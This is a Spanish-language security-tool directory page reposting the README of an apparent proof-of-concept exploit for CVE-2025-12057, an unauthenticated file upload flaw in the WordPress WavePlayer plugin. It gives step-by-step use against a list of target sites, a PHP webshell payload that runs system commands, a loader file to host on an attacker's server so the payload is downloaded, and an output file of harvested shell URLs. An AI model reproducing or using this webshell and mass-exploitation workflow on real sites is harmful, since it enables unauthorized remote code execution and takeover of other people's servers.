Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-12057-WordPress-Exploit-PoC — PoC para CVE-2025-12057 - Carga Arbitraria de Archivos No Autenticada en el plugin WavePlayer de WordPress que conduce a RCE | Kitploit
Herramientas/GitHubGitHub/deadexpl0it/cve-2025-12057-wordpress-exploit-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónDesarrollo de Payloads
GitHubdeadexpl0it/cve-2025-12057-wordpress-exploit-poc

CVE-2025-12057-WordPress-Exploit-PoC

PoC para CVE-2025-12057 - Carga Arbitraria de Archivos No Autenticada en el plugin WavePlayer de WordPress que conduce a RCE

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 5 mesesAún no revisado

CVE-2025-12057 – PoC de RCE en WavePlayer de WordPress

Prueba de Concepto (PoC) para CVE-2025-12057, una vulnerabilidad crítica que afecta al plugin WavePlayer de WordPress (< 3.8.0).

Esta vulnerabilidad permite a atacantes no autenticados subir archivos arbitrarios al servidor, lo que puede llevar a Ejecución Remota de Código (RCE) mediante la subida de un archivo PHP malicioso (webshell).

Un atacante puede abusar de la funcionalidad de subida vulnerable para colocar un payload PHP en el servidor y ejecutar comandos del sistema.


Detalles de la Vulnerabilidad

CVE: CVE-2025-12057
Tipo: Subida Arbitraria de Archivos sin Autenticación
Impacto: Ejecución Remota de Código (RCE)
Plugin Afectado: WavePlayer
Versiones Afectadas: < 3.8.0
Gravedad: Crítica

Los atacantes pueden subir archivos maliciosos al directorio de subidas de WordPress y ejecutarlos remotamente.


Uso

1. Ejecutar el exploit

Ejecuta el script:

root@kitploit:~
python3 wave.py

2. Proporcionar la lista de sitios objetivo

El script solicitará la ruta de un archivo .txt que contenga los sitios objetivo.

Ejemplo:

root@kitploit:~
sites.txt

Contenido de ejemplo:

root@kitploit:~
https://example.com
https://target2.com
https://target3.com

Cada línea debe contener una URL de sitio WordPress.


3. Preparar el payload

Crea un archivo PHP de payload.

Ejemplo:

root@kitploit:~
payload.php

Contenido de ejemplo:

root@kitploit:~
<?php
system($_GET['cmd']);
?>

4. Hacer que el payload sea descargable

El exploit requiere una URL de payload PHP descargable directamente.

Para ello, crea otro archivo PHP en el mismo directorio que el payload.

Estructura de ejemplo:

root@kitploit:~
payload.php
loader.php

Contenido de loader.php:

root@kitploit:~
<?php
// name of the payload file to return
$file = "payload.php";

// force the server to return the file as PHP content
header("Content-Type: application/x-httpd-php");

// output the payload file
readfile($file);
exit;
?>

Explicación:

  • $file = "payload.php"; → nombre del archivo payload a servir
  • header("Content-Type: application/x-httpd-php"); → obliga al servidor a devolver el archivo como PHP
  • readfile($file); → muestra el contenido del payload

Esto permite que el script del exploit descargue el payload correctamente.


5. Usar tu URL de payload

Sube ambos archivos a tu servidor.

URL de payload de ejemplo:

root@kitploit:~
http://your-server.com/loader.php

Cuando el script solicite la URL del payload, proporciona el enlace a loader.php.


6. Resultados

Los objetivos explotados con éxito se guardarán en:

root@kitploit:~
shells.txt

Salida de ejemplo:

root@kitploit:~
https://example.com/wp-content/uploads/peaks/external/{random_numbers}.php
https://target2.com/wp-content/uploads/peaks/external/{random_numbers}.php

Palabras clave

exploit de wordpress
poc de wordpress
rce de wordpress
exploit de waveplayer
subida arbitraria de archivos
ejecución remota de código
bug bounty
cve-2025-12057


Descargo de responsabilidad

Este proyecto se proporciona solo con fines educativos y para pruebas de seguridad autorizadas.

El autor no es responsable del uso indebido o actividades ilegales realizadas con este código.

Descargar herramienta